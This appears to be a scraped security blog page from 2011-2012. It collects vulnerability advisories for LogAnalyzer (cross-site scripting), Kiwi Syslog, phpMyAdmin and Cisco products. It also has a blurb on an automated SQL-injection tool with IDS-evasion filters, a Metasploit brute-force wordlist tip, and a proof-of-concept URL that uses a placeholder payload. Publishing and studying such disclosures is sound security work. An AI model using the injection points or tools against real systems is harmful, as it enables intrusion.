Title:
======
Log Analyzer 3.6.0 - Cross Site Scripting Vulnerability
Date:
=====
2012-12-20
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=792
Vendor: http://loganalyzer.adiscon.com/security-advisories/loganalyzer-cross-site-scripting-vulnerability-in-oracle_query-paramater
VL-ID:
=====
792
Common Vulnerability Scoring System:
====================================
1.5
Introduction:
=============
LogAnalyzer is part of Adiscon`s MonitorWare line of monitoring applications. It runs both under Windows and Unix/Linux.
The database can be populated by MonitorWare Agent, WinSyslog or EventReporter on the Windows side and by rsyslog on
the Unix/Linux side. LogAnalyzer itself is free, GPLed software (as are some other members of the product line).
(Copy of the Vendor Homepage: http://loganalyzer.adiscon.com/ )
Abstract:
=========
An
independent vulnerability laboratory researcher discovered a cross site
scripting vulnerability in the log analyzer v3.6.0 web application.
Report-Timeline:
================
2012-12-20: Public or Non-Public Disclosure
Status:
========
Published
Exploitation-Technique:
=======================
Remote
Severity:
=========
Low
Details:
========
A client side cross-site scripting vulnerability is detected in the LogAnalyzer 3.6.0 web application.
The vulnerability allows an remote attacker with high required user interaction to force client side xss requests.
The vulnerability is located in the asktheoracle.php file with the bound vulnerable oracle_query parameter request.
An attackers can force client side requests to execute arbitrary script code by using the oracle_query parameter.
Successful exploitation of the vulnerability results in client side execution of inject script, client side phishing,
client side module context manipulation and evil unautorized external redirects.
Vulnerable File(s):
[+] asktheoracle.php
Vulnerable Parameter(s):
[+] oracle_query
Proof of Concept:
=================
The
client side cross site scripting vulnerability can be exploited by
remote attackers with medium or high required user interaction
and without privileged application user account.
http://192.168.1.10:8080/loganalyzer-3.6.0/asktheoracle.php?type=searchstr&oracle_query=[CLIENT SIDE SCRIPT CODE!]
Note: The 'oracle_query' parameter didn't sanitize properly for asktheoracle.php page.
Solution:
=========
Upgrade to the latest version of Log Analyzer 3.6.1
Risk:
=====
The security risk of the client side cross site scripting web vulnerability is estimated as low(+)
Credits:
========
Mohd Izhar Ali - [http://johncrackernet.blogspot.com]
Disclaimer:
===========
The
information provided in this advisory is provided as it is without any
warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab
or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business
profits
or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some
states do not
allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation
may not apply. We do
not approve or encourage anybody to break any vendor licenses, policies,
deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:
vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Any modified copy or
reproduction, including partially usages, of this file requires
authorization from Vulnerability Laboratory.
Permission to
electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other
media, are
reserved by Vulnerability-Lab Research Team or its suppliers. All
pictures, texts, advisories, sourcecode, videos and
other
information on this website is trademark of vulnerability-lab team &
the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
Copyright © 2012 | Vulnerability Laboratory
Thursday, December 20, 2012
Loganalyzer Cross Site Scripting Vulnerability in oracle_query paramater
Loganalyzer Cross Site Scripting Vulnerability in oracle_query paramater
A cross-site scripting vulnerability in the oracle_query parameter of the asktheoracle.php page was brought to our attention by Mohd Izhar Bin Ali. We thank then for giving us the chance to fix this issue before releasing information into the public. More details about the vulnerabilities can be found in this security advisory.
Affected Stable Versions:
Stable branch up to v3.6.0 (inclusive)
Fix:
Update to 3.6.1 or higher (if available)
Cross Site Scripting
Short Description:
A cross-site scripting vulnerability existed in the asktheoracle.php page. An attacker could use it to execute arbitrary HTML and Script code by using the oracle_query parameter.
Potential Impact:
An attacker could use prepared links to include and run scripts within the context of LogAnalyzer on the users browser.
Credits:
We want to thank Mohd Izhar Bin Ali for identifying these issues and working with us in resolving it. More details can be found in their advisory.
A cross-site scripting vulnerability in the oracle_query parameter of the asktheoracle.php page was brought to our attention by Mohd Izhar Bin Ali. We thank then for giving us the chance to fix this issue before releasing information into the public. More details about the vulnerabilities can be found in this security advisory.
Affected Stable Versions:
Stable branch up to v3.6.0 (inclusive)
Fix:
Update to 3.6.1 or higher (if available)
Cross Site Scripting
Short Description:
A cross-site scripting vulnerability existed in the asktheoracle.php page. An attacker could use it to execute arbitrary HTML and Script code by using the oracle_query parameter.
Potential Impact:
An attacker could use prepared links to include and run scripts within the context of LogAnalyzer on the users browser.
Credits:
We want to thank Mohd Izhar Bin Ali for identifying these issues and working with us in resolving it. More details can be found in their advisory.
Wednesday, December 19, 2012
Kiwi Syslog Web Access 1.4.4 SQL Injection & Blind SQL Injection
Product: Kiwi Syslog Web Access
Version: 1.4.4
Vendor: http://www.kiwisyslog.com/kiwi-syslog-server-overview/
Vulnerability type: SQL Injection and Blind SQL Injection
Risk level: High
Vendor notification: 2012-12-18
Tested on: Windows 2003
Author: Mohd Izhar Ali
Kiwi Syslog Web Access version 1.4.4 suffers from remote SQL injection and blind SQL injection vulnerabilities.
You can download here:
http://packetstormsecurity.org/files/118945/Kiwi-Syslog-Web-Access-1.4.4-SQL-Injection.html
Version: 1.4.4
Vendor: http://www.kiwisyslog.com/kiwi-syslog-server-overview/
Vulnerability type: SQL Injection and Blind SQL Injection
Risk level: High
Vendor notification: 2012-12-18
Tested on: Windows 2003
Author: Mohd Izhar Ali
Kiwi Syslog Web Access version 1.4.4 suffers from remote SQL injection and blind SQL injection vulnerabilities.
You can download here:
http://packetstormsecurity.org/files/118945/Kiwi-Syslog-Web-Access-1.4.4-SQL-Injection.html
Labels:
Hacking,
IDS/NSM,
Pen-Test,
Security,
Vulnerability
Tuesday, September 25, 2012
How to find latest IE vulnerability (CVE-2012-4969) with Nexpose
As you probably know, Microsoft released advisory 2757760 (Microsoft Security Advisory (2757760): Vulnerability in Internet Explorer Could Allow Remote Code Execution) which describes a Remote Code Execution vulnerability in Internet Explorer 7, 8, and 9. This was assigned to CVE-2012-4969 and Microsoft released a Security Update patch on September 21st, 2012 (Microsoft Security Bulletin MS12-063 - Critical : Cumulative Security Update for Internet Explorer (2744842)) to address this vulnerability.
Check out this blog about the 0-day exploit released by the Metasploit team on September 17th, 2012. As of Nexpose 5.4.5, released on September 22nd, 2012, you can also now find and remediate any assets that are vulnerable. Here's how:
To continue reading; please click here:
phpMyAdmin Compromised Source Package Backdoor Security Issue
A security issue has been reported in phpMyAdmin, which can be exploited by malicious people to compromise a vulnerable system. The security issue is caused due to the distribution of a compromised phpMyAdmin source code package containing a backdoor, which can be exploited to e.g. execute arbitrary PHP code.
Secunia ID | |
Release Date |
25 Sep 2012
|
Criticality | |
Solution Status |
Vendor Patch
|
Software |
phpMyAdmin 3.x
|
Where | |
Impact | System access
This covers vulnerabilities where malicious people are able to gain system access and execute arbitrary code with the privileges of a local user.
|
Description |
A security issue has been reported in phpMyAdmin, which can be exploited by malicious people to compromise a vulnerable system.
The security issue is caused due to the distribution of a compromised phpMyAdmin source code package containing a backdoor, which can be exploited to e.g. execute arbitrary PHP code.
The compromised source file was distributed via the "cdnetworks-kr-1" SourceForge mirror with the phpMyAdmin-3.5.2.2-all-languages.zip download.
|
Solution |
Download and reinstall phpMyAdmin.
|
Reported by |
The vendor credits Tencent Security Response Center.
|
Original Advisory |
Saturday, February 04, 2012
FBI Arrests Suspected LulzSec and Anonymous Hackers
Search warrants were also being executed in New Jersey, Minnesota and Montana. The FBI arrested two alleged members of the hacking collectives LulzSec and Anonymous on Thursday morning in San Francisco and Phoenix, According to Fox news. The suspected hacker arrested in California is homeless and alleged to have been involved in the hacking of Santa Cruz County government websites.
The person arrested in Arizona is a student at a technical university and allegedly participated in the widely publicized hack against Sony. Both groups have been targeted by the FBI and international law enforcement agencies in recent months.
The person arrested in Arizona is a student at a technical university and allegedly participated in the widely publicized hack against Sony. Both groups have been targeted by the FBI and international law enforcement agencies in recent months.
Meanwhile, the FBI arrested an alleged Anonymous member in San Francisco. The man, who is reported to be homeless, is said to have been involved in internet attacks against Santa Cruz County government websites.Just because a man is homeless, of course, doesn't mean that he can't get an internet connection. Coffee houses, cafes, libraries, etc can all offer cheap or free internet access - and because the computer being used can be a shared device, it may be harder to identify who might have been responsible for an attack compared to a PC at a home.
The arrests shouldn't surprise anyone. They made two errors:
Mistake #1: They brough too much attention to themselves.
It is said that John Gotti, the mafia boss, brought so much attention to himself that he became a natural, high profile target for law enforcement. As Amichai Shulman, our CTO, stated before, the Lulzsec, the hackers "were extremely unfocused in their goal and gained attention mainly due to the relative intensity of their activity and lack of other good media topics." They brought too much attention to themselves and you could expect law enforcement to find them. If you look at hacking historically, over the past 20 years many of the high-profile attacks or those that involve serious losses to governments or commercial companies have ended up with law enforcement finding the perpetrators eventually, such as Albert Gonzalez.
Mistake #2: They didn't cover up their tracks.
Let's review some of the Lulzsec chat logs from a few months ago. One snippet, in reference to discussions Lulzsec was having with the media, shows how the hackers themselves admit they gave away too much informaiton:
Topiary - Sabu and I got a bit carried away and gave LulzSec away a bit
As Imperva's Tal Be'ery said in this USA Today article, "When you're running this kind of operation for a long time, especially with not very concrete plans, you're bound to make mistakes." The mistakes Lulzsec and Anonymous made during their hacking spree left an electronic trail with enough foot prints to product today's arrests.
Thursday, December 15, 2011
sslyze – Fast and Full-Featured SSL Configuration Scanner
Transport Layer Security (TLS), commonly called SSL, is one of the most widely used protocols to secure network communications. As costs fall and user security and privacy expectations rise companies are deploying it more widely every year. Attacks against the CA system, SSL implementation flaws and aging protocol versions have grabbed news headlines, bringing attention to weak configurations, and the need to avoid them. Additionally, server misconfiguration has always greatly increased the overhead caused by SSL, slowing the transition to improved communications security.
To help improve system configurations, iSEC is releasing the free software “SSLyze” tool. They have found this tool helpful for analyzing the configuration of SSL servers and for identifying misconfiguration such as the use of outdated protocol versions, weak hash algorithms in trust chains, insecure renegotiation, and session resumption settings.
SSLyze is a stand-alone python application that looks for classic SSL misconfiguration, while providing the advanced user with the opportunity to customize the application via a simple plugin interface.
Features
- Insecure renegotiation testing
- Scanning for weak strength ciphers
- Checking for SSLv2, SSLv3 and TLSv1 versions
- Server certificate information dump and basic validation
- Session resumption capabilities and actual resumption rate measurement
- Support for client certificate authentication
- Simultaneous scanning of multiple servers, versions and ciphers
For example, SSLyze can help user’s identify server configurations vulnerable to THC’s recently released SSL DOS attack by checking the server’s support for client-initiated renegotiations. For more information on testing for client-initiated renegotiations, you can readhere.
You can download sslyze here:
Microsoft Security Bulletin for December 2011
Microsoft’s Security Bulletin for December 2011 includes 13 bulletins addressing 17 vulnerabilities. Three of the bulletins are rated "critical": MS11-087, MS11-090, and MS11-092 and the rest are "important". This month many of the patches relate to vulnerabilities with known exploits likely available in the wild, so it is essential that organizations prioritize patching as soon as possible.
Microsoft reports that the exploit code for the “critical” MS11-087 and MS11-092 is likely to be in the wild. This comes as no surprise with MS11-087, which addresses the much publicized zero-day vulnerability related to the malicious Duqu worm. The vulnerability is in Windows kernel-mode drivers and could allow remote code execution. Microsoft previously released a workaround for this as a part of Microsoft Security Advisory #2639658, so organizations applying patch MS11-087 need to also undo the workaround if it was deployed.
MS11-092 is a vulnerability in Windows Media player and Media Center, which an attacker could use to phish a victim into visiting a site or opening a file on their site. Microsoft also reports that there is likely already exploit code available for this vulnerability.
This month, there are a couple of updates related to Internet Explorer. MS11-092 is an Active-X bug that exploits a user when they visit a webpage with Internet Explorer. MS11-099 is a cumulative security update for Internet Explorer. Browser updates always get my attention because browsers are on the front line in the security battle. As we approach the end of the year, organizations should be thinking about bringing in the new year by upgrading their legacy browsers and upgrading to Internet Explorer 9.
There are several bulletins related to Microsoft Office Suite and applications related to it such as Powerpoint, Publisher, and Excel. MS11-094, related to Powerpoint, is like to have exploit code in the wild.
According to the 80/20 rule, 20% of your vulnerabilities will likely cause 80% of your security risk. I see Microsoft getting the number of critical bulletins way down, but at the same time those criticals could be responsible for mass compromises and included in mass malware packs.
This is a month where Microsoft patched a wide variety of vulnerabilities so organizations need to test and patch the “critical” ones as soon as possible, and prioritize the “importants” by which ones have exploit code available, and which ones allow remote code execution.
From: https://community.rapid7.com/community/infosec/blog/2011/12/14/microsoft-security-bulletin-for-december-2011
Microsoft reports that the exploit code for the “critical” MS11-087 and MS11-092 is likely to be in the wild. This comes as no surprise with MS11-087, which addresses the much publicized zero-day vulnerability related to the malicious Duqu worm. The vulnerability is in Windows kernel-mode drivers and could allow remote code execution. Microsoft previously released a workaround for this as a part of Microsoft Security Advisory #2639658, so organizations applying patch MS11-087 need to also undo the workaround if it was deployed.
MS11-092 is a vulnerability in Windows Media player and Media Center, which an attacker could use to phish a victim into visiting a site or opening a file on their site. Microsoft also reports that there is likely already exploit code available for this vulnerability.
This month, there are a couple of updates related to Internet Explorer. MS11-092 is an Active-X bug that exploits a user when they visit a webpage with Internet Explorer. MS11-099 is a cumulative security update for Internet Explorer. Browser updates always get my attention because browsers are on the front line in the security battle. As we approach the end of the year, organizations should be thinking about bringing in the new year by upgrading their legacy browsers and upgrading to Internet Explorer 9.
There are several bulletins related to Microsoft Office Suite and applications related to it such as Powerpoint, Publisher, and Excel. MS11-094, related to Powerpoint, is like to have exploit code in the wild.
According to the 80/20 rule, 20% of your vulnerabilities will likely cause 80% of your security risk. I see Microsoft getting the number of critical bulletins way down, but at the same time those criticals could be responsible for mass compromises and included in mass malware packs.
This is a month where Microsoft patched a wide variety of vulnerabilities so organizations need to test and patch the “critical” ones as soon as possible, and prioritize the “importants” by which ones have exploit code available, and which ones allow remote code execution.
From: https://community.rapid7.com/community/infosec/blog/2011/12/14/microsoft-security-bulletin-for-december-2011
Tuesday, December 06, 2011
Vendor Security
I’d like to share our experiences with vendor security since I’m sure it’s something that impacts all of us. Like every company, Rapid7 relies on a number of technology vendors for a huge range of products and services to run the business. I’m sure no one will be surprised to hear that as a security company we have a policy specifying the security requirements that our vendors need to meet before we’ll do business with them. Our view is that their security directly impacts any of our internal or customer data that their systems hold, so we take it as seriously as our own infrastructure security. Most or all of you probably have the same approach, but one unique thing that we have at our disposal is a number of highly skilled security experts on staff which allows us to have a mandatory application security assessment as part of our policy.
The results of this policy over the last few years have been eye-opening. The number of prospective vendors that pass our security bar is disappointingly low, across every category we used (marketing tools, sales tools, support tools, file transfer tools, IT infrastructure, etc). The most recent failure sparked this blog post, but it was the norm rather than the exception. More often than not they fail basic tests with numerous readily apparent and easily exploitable issues. If the vendor has a great product or service that we think is significantly better than the alternatives we evaluated, we’ll delay our deployment while we engage with them to address the issues we found, getting commitments to fix in a defined timeline. The results there have been equally dismal, with most of them missing their commitments and forcing us to end up going with an alternate months later. It’s clear that our security bar is far higher than their bar, but also that in many cases they don’t have either the desire or skills to significantly improve their security.
All of this ends up slowing our deployment of the various third party solutions, which is an acceptable tradeoff in our view. But what do we do when none of the vendors in the space pass the security bar? And more broadly, what can we do as a security community to raise awareness of the state of vendor security and create impetus for change? Our individual efforts to push the vendors we’ve engaged with generally haven’t been enough to move the ball. If you have any suggestions on how we can tackle this as a community, please post them below.
In the meantime, I thought I’d share our own approach in case it’s useful to any of you. The overall approach we use is a coordinated process between procurement, legal, and IT security. Having a coordinated process between the business discussion and technical due diligence allows for not just improved decision making, but also more informed negotiation.
- First, in addition to screening new vendors, if you haven’t already been doing this, start by pulling together a list of all your existing vendors (particularly SaaS vendors that have an exposed security surface). This will be eye-opening the first time you do it, since lots of groups will have been using tools without any IT involvement.
- One useful tactic we use to find out what’s in use and catch new ad-hoc “deployments” that bypass your vetting process is a periodic review of corporate credit card statements, flagging expenses associated with known vendors & SaaS providers.
- Use a security questionnaire to understand their security policies, processes, and sophistication.
- Demand to see the results of their latest security audit, showing what was tested, the findings, and the remediation they’ve done since that time. (We do an audit ourselves because we can). Negotiate for rights to this on a periodic basis.
- Pay close attention to audit logging functionality. Does the SaaS application track and report on login/logout, user actions within the application, and does it track source IP address? At the very least, you will want to conduct periodic reviews of the account logs to check for anomalies.
- Scrutinize the identity management capabilities and set a policy for how they are used. Access management, particularly account management, is one of the weakest areas of SaaS security today. Multiple users are often tempted to share accounts because account limits are common to SaaS: this practice needs to be discouraged. Organizational password strength and password rotation policies are usually difficult to enforce when it comes to SaaS. Account provisioning and de-provisioning usually happens outside the IT group, and sometimes there are multiple users on a SaaS application with the ability to create accounts but no single user with clear ownership of, and responsibility for, the application. This creates a substantial risk that accounts will not be revoked in a timely fashion upon a change in employment status. Some approaches that can mitigate the issue:
- Ensure that IT is solely responsible for account management in all SaaS applications.
- Conduct periodic reviews of active SaaS accounts across all applications, matching to current employee rosters.
- Work with your SaaS provider to enact IP-level restrictions to all logins, so that employees are required to be either physically present in the office or connected to the VPN to log in to the SaaS application. This will require the VPN to operate in “full tunnel” mode, where all traffic (including internet traffic) is driven over the VPN to egress from the corporate network.
- Most SaaS applications allow you to grant different levels of permissions to different users. As much as possible, place reasonable limits on user access levels in SaaS applications. Restrict manager privileges to as few accounts as possible
As companies increasingly rely on SaaS solutions to do every day business, and security moves even further outside of your control, it becomes more and more important to proactively ensure the security and integrity of the solution you rely on. Employing a number of these suggestions, when considering your SaaS solutions, will help put you on the road to a higher level of security serving both your internal stakeholders and customers well.
Article from Rapid7 Blog:
The Mole – Automatic SQL Injection SQLi Exploitation Tool
The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.
Features:
Features:
- Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
- Command line interface. Different commands trigger different actions.
- Auto-completion for commands, command arguments and database, table and columns names.
- Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
- Developed in python 3.
If you want to see documentation, download or tutorial, please refer here:
Labels:
Database,
Hacking,
Pen-Test,
Security,
Vulnerability
Adding custom wordlists in Metasploit for brute force password audits
In any penetration test that involves brute forcing passwords, you may want to increase your chances of a successful password audit by adding custom wordlists specific to the organization that hired you. Some examples:
- If you are security testing a hospital, you may want to add a dictionary with medical terms.
- If you're testing a German organization, users are likely to use German passwords, so you should add a German wordlist.
- Another good idea is to build a custom wordlist based on the organization's website (try the Worldlist Ruby gem to generate a wordlist based on a URL scrape)
For more details, please refer to this Metasploit Blog:
October 2011: Ten Cisco Vulnerabilities
The Cisco Product Security Incident Response Team (PSIRT) has published ten important vulnerability advisories:
- Buffer Overflow Vulnerabilities in the Cisco WebEx Player
- Cisco Unified Contact Center Express Directory Traversal Vulnerability
- Denial of Service Vulnerability in Cisco Video Surveillance IP Cameras
- Cisco Security Agent Remote Code Execution Vulnerabilities
- Cisco Unified Communications Manager Directory Traversal Vulnerability
- CiscoWorks Common Services Arbitrary Command Execution Vulnerability
- Cisco Show and Share Security Vulnerabilities
- Directory Traversal Vulnerability in Cisco Network Admission Control Manager
- Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
- Multiple Vulnerabilities in Cisco Firewall Services Module
Buffer Overflow Vulnerabilities in the Cisco WebEx Player
Multiple buffer overflow vulnerabilities exist in the Cisco WebEx Recording Format (WRF) player. In some cases, exploitation of the vulnerabilities could allow a remote attacker to execute arbitrary code on the system with the privileges of a targeted user.
Vulnerable Products
The vulnerabilities disclosed in this advisory affect the Cisco WRF players. The Microsoft Windows, Apple Mac OS X, and Linux versions of the players are all affected. Review the following table for the list of releases that contain the nonvulnerable code. Affected versions of the players are those prior to client build T26 SP49 EP40 and T27 SP28. These build numbers are available only to WebEx site administrators. End users will see a version such as “Client build: 27.25.4.11889.” This indicates the server is running software version T27 SP25 EP4.
The vulnerabilities disclosed in this advisory affect the Cisco WRF players. The Microsoft Windows, Apple Mac OS X, and Linux versions of the players are all affected. Review the following table for the list of releases that contain the nonvulnerable code. Affected versions of the players are those prior to client build T26 SP49 EP40 and T27 SP28. These build numbers are available only to WebEx site administrators. End users will see a version such as “Client build: 27.25.4.11889.” This indicates the server is running software version T27 SP25 EP4.
Details
The Cisco WebEx Recording Format (WRF) Player is affected by the following vulnerabilities:
The Cisco WebEx Recording Format (WRF) Player is affected by the following vulnerabilities:
- Cisco WebEx Player WRF Parsing Vulnerability: This vulnerability has been assigned the following Common Vulnerabilities and Exposures (CVE) identifier: CVE-2011-3319
- Cisco WebEx Player ATAS32 Processing Vulnerability:This vulnerability has been assigned the following Common Vulnerabilities and Exposures (CVE) identifier: CVE-2011-4004
The vulnerabilities may cause the player application to crash or, in some cases, remote code execution could occur.
Impact
Successful exploitation of the vulnerabilities described in this document could cause the Cisco WRF player application to crash and, in some cases, allow a remote attacker to execute arbitrary code on the system with the privileges of the user who is running the WRF player application.
Successful exploitation of the vulnerabilities described in this document could cause the Cisco WRF player application to crash and, in some cases, allow a remote attacker to execute arbitrary code on the system with the privileges of the user who is running the WRF player application.
Cisco Unified Contact Center Express Directory Traversal Vulnerability
Cisco Unified Contact Center Express (UCCX or Unified CCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) contain a directory traversal vulnerability that may allow a remote, unauthenticated attacker to retrieve arbitrary files from the filesystem.
Cisco Unified Contact Center Express (UCCX or Unified CCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) contain a directory traversal vulnerability that may allow a remote, unauthenticated attacker to retrieve arbitrary files from the filesystem.
Vulnerable Products
The following Cisco UCCX versions are vulnerable:
The following Cisco UCCX versions are vulnerable:
- Cisco UCCX version 6.0(x)
- Cisco UCCX version 7.0(x)
- Cisco UCCX version 8.0(x)
- Cisco UCCX version 8.5(x)
The following Cisco Unified IP Interactive Voice Response versions are vulnerable:
- Cisco Unified IP Interactive Voice Response version 6.0(x)
- Cisco Unified IP Interactive Voice Response version 7.0(x)
- Cisco Unified IP Interactive Voice Response version 8.0(x)
- Cisco Unified IP Interactive Voice Response version 8.5(x)
Details
The Cisco Unified Contact Center Express is a single/two node server, integrated “contact center in a box” for use in deployments with up to 300 agents until software version 8.0(x) and 400 agents starting at version 8.5(x). The vulnerability is due to improper input validation, and could allow the attacker to traverse the filesystem directory. An attacker could exploit this vulnerability by sending a specially crafted URL to the affected system. The vulnerability in Cisco Unified Contact Center Express and Cisco Unified IP Interactive Voice Response could be exploited over TCP port 8080 in 6.0(x) and 7.0(x) versions and TCP port 9080 starting in 8.0(x) version of the product.
The Cisco Unified Contact Center Express is a single/two node server, integrated “contact center in a box” for use in deployments with up to 300 agents until software version 8.0(x) and 400 agents starting at version 8.5(x). The vulnerability is due to improper input validation, and could allow the attacker to traverse the filesystem directory. An attacker could exploit this vulnerability by sending a specially crafted URL to the affected system. The vulnerability in Cisco Unified Contact Center Express and Cisco Unified IP Interactive Voice Response could be exploited over TCP port 8080 in 6.0(x) and 7.0(x) versions and TCP port 9080 starting in 8.0(x) version of the product.
Impact
Successful exploitation of the vulnerability may allow a remote, unauthenticated attacker to retrieve arbitrary files from the Cisco Unified Contact Center Express or Cisco Unified IP Interactive Voice Response filesystem.
Successful exploitation of the vulnerability may allow a remote, unauthenticated attacker to retrieve arbitrary files from the Cisco Unified Contact Center Express or Cisco Unified IP Interactive Voice Response filesystem.
Denial of Service Vulnerability in Cisco Video Surveillance IP Cameras
A denial of service (DoS) vulnerability exists in the Cisco Video Surveillance IP Cameras 2421, 2500 series and 2600 series of devices. An unauthenticated, remote attacker could exploit this vulnerability by sending crafted RTSP TCP packets to an affected device. Successful exploitation prevents cameras from sending video streams, subsequently causing a reboot. The camera reboot is done automatically and does not require action from an operator.
A denial of service (DoS) vulnerability exists in the Cisco Video Surveillance IP Cameras 2421, 2500 series and 2600 series of devices. An unauthenticated, remote attacker could exploit this vulnerability by sending crafted RTSP TCP packets to an affected device. Successful exploitation prevents cameras from sending video streams, subsequently causing a reboot. The camera reboot is done automatically and does not require action from an operator.
Vulnerable Products
Cisco Video Surveillance IP Cameras 2421, 2500 series, and 2600 series are affected by this vulnerability. For Cisco Video Surveillance 2421 and 2500 series IP Cameras, all 1.1.x software releases and releases prior 2.4.0 are affected by this vulnerability, For Cisco Video Surveillance 2600 IP Camera, all software releases before 4.2.0-13 are affected by this vulnerability.
Cisco Video Surveillance IP Cameras 2421, 2500 series, and 2600 series are affected by this vulnerability. For Cisco Video Surveillance 2421 and 2500 series IP Cameras, all 1.1.x software releases and releases prior 2.4.0 are affected by this vulnerability, For Cisco Video Surveillance 2600 IP Camera, all software releases before 4.2.0-13 are affected by this vulnerability.
Details
The Cisco Video Surveillance IP Cameras 2421, 2500 series, and 2600 series of devices are affected by a RSTP TCP crafted packets denial of service vulnerability that may allow an unauthenticated attacker to cause the device to reload by sending a series of crafted packets. This vulnerability can be exploited from both wired and wireless segments.
The Cisco Video Surveillance IP Cameras 2421, 2500 series, and 2600 series of devices are affected by a RSTP TCP crafted packets denial of service vulnerability that may allow an unauthenticated attacker to cause the device to reload by sending a series of crafted packets. This vulnerability can be exploited from both wired and wireless segments.
Impact
Successful exploitation of the vulnerability may result in DoS condition. Subsequent exploitation may result in sustained DoS condition, as the cameras will continue to reload.
Successful exploitation of the vulnerability may result in DoS condition. Subsequent exploitation may result in sustained DoS condition, as the cameras will continue to reload.
Cisco Security Agent Remote Code Execution Vulnerabilities
Cisco Security Agent is affected by vulnerabilities that could allow an unauthenticated attacker to perform remote code execution on the affected device. These vulnerabilities are in a third-party library (Oracle Outside In) and are documented in CERT-CC.
Cisco Security Agent is affected by vulnerabilities that could allow an unauthenticated attacker to perform remote code execution on the affected device. These vulnerabilities are in a third-party library (Oracle Outside In) and are documented in CERT-CC.
Vulnerable Products
These vulnerabilities only affect 6.x versions of Cisco Security Agent running on Windows platforms.
These vulnerabilities only affect 6.x versions of Cisco Security Agent running on Windows platforms.
Details
Version 6.x of Cisco Security Agent running on Windows platforms is affected by the following vulnerabilities:
Version 6.x of Cisco Security Agent running on Windows platforms is affected by the following vulnerabilities:
- Vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5.0 allows local users to affect availability, related to File ID SDK: This vulnerability is assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2011-0794
- Vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.2.0 and 8.3.5.0 allows local users to affect availability via vectors related to Outside In Filters: This vulnerability is assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2011-0808
Impact
Successful exploitation of these vulnerabilities could allow an unauthenticated attacker to perform remote code execution on the affected device that will execute with Administrator privileges.
Successful exploitation of these vulnerabilities could allow an unauthenticated attacker to perform remote code execution on the affected device that will execute with Administrator privileges.
Cisco Unified Communications Manager Directory Traversal Vulnerability
Cisco Unified Communications Manager contains a directory traversal vulnerability that may allow an unauthenticated, remote attacker to retrieve arbitrary files from the filesystem.
Cisco Unified Communications Manager contains a directory traversal vulnerability that may allow an unauthenticated, remote attacker to retrieve arbitrary files from the filesystem.
Vulnerable Products
The following products are affected by this vulnerability:
The following products are affected by this vulnerability:
- Cisco Unified Communications Manager 6.x
- Cisco Unified Communications Manager 7.x
- Cisco Unified Communications Manager 8.x
Details
Cisco Unified Communications Manager is the call processing component of the Cisco IP Telephony solution that extends enterprise telephony features and functions to packet telephony network devices such as IP phones, media processing devices, VoIP gateways, and multimedia applications.
Cisco Unified Communications Manager is the call processing component of the Cisco IP Telephony solution that extends enterprise telephony features and functions to packet telephony network devices such as IP phones, media processing devices, VoIP gateways, and multimedia applications.
Impact
Successful exploitation of the vulnerability may allow a remote, unauthenticated attacker to retrieve arbitrary files from the filesystem.
Successful exploitation of the vulnerability may allow a remote, unauthenticated attacker to retrieve arbitrary files from the filesystem.
CiscoWorks Common Services Arbitrary Command Execution Vulnerability
CiscoWorks Common Services for Microsoft Windows contains a vulnerability that could allow an authenticated, remote attacker to execute arbitrary commands on the affected system with the privileges of a system administrator.
CiscoWorks Common Services for Microsoft Windows contains a vulnerability that could allow an authenticated, remote attacker to execute arbitrary commands on the affected system with the privileges of a system administrator.
Vulnerable Products
This vulnerability affects all versions of CiscoWorks Common Services-based products running on Microsoft Windows. Common Services version 4.1 and later are not affected by this vulnerability.
This vulnerability affects all versions of CiscoWorks Common Services-based products running on Microsoft Windows. Common Services version 4.1 and later are not affected by this vulnerability.
Details
CiscoWorks Common Services for Microsoft Windows contains a vulnerability that could allow an authenticated, remote attacker to execute arbitrary commands on the affected system with the privileges of a system administrator. The vulnerability is due to improper input validation in the CiscoWorks Home Page component. An attacker could exploit this vulnerability by sending a specially crafted URL to the affected system. An exploit could allow the attacker to execute arbitrary commands on the affected system with the privileges of a system administrator.
This vulnerability affects CiscoWorks Common Services running only on Microsoft Windows.
This vulnerability could be exploited over the default management ports, TCP port 1741 or 443.
CiscoWorks Common Services for Microsoft Windows contains a vulnerability that could allow an authenticated, remote attacker to execute arbitrary commands on the affected system with the privileges of a system administrator. The vulnerability is due to improper input validation in the CiscoWorks Home Page component. An attacker could exploit this vulnerability by sending a specially crafted URL to the affected system. An exploit could allow the attacker to execute arbitrary commands on the affected system with the privileges of a system administrator.
This vulnerability affects CiscoWorks Common Services running only on Microsoft Windows.
This vulnerability could be exploited over the default management ports, TCP port 1741 or 443.
Impact
Successful exploitation of this vulnerability may allow an authenticated, remote attacker to execute arbitrary commands on the affected system with the privileges of a system administrator.
Successful exploitation of this vulnerability may allow an authenticated, remote attacker to execute arbitrary commands on the affected system with the privileges of a system administrator.
Cisco Show and Share Security Vulnerabilities
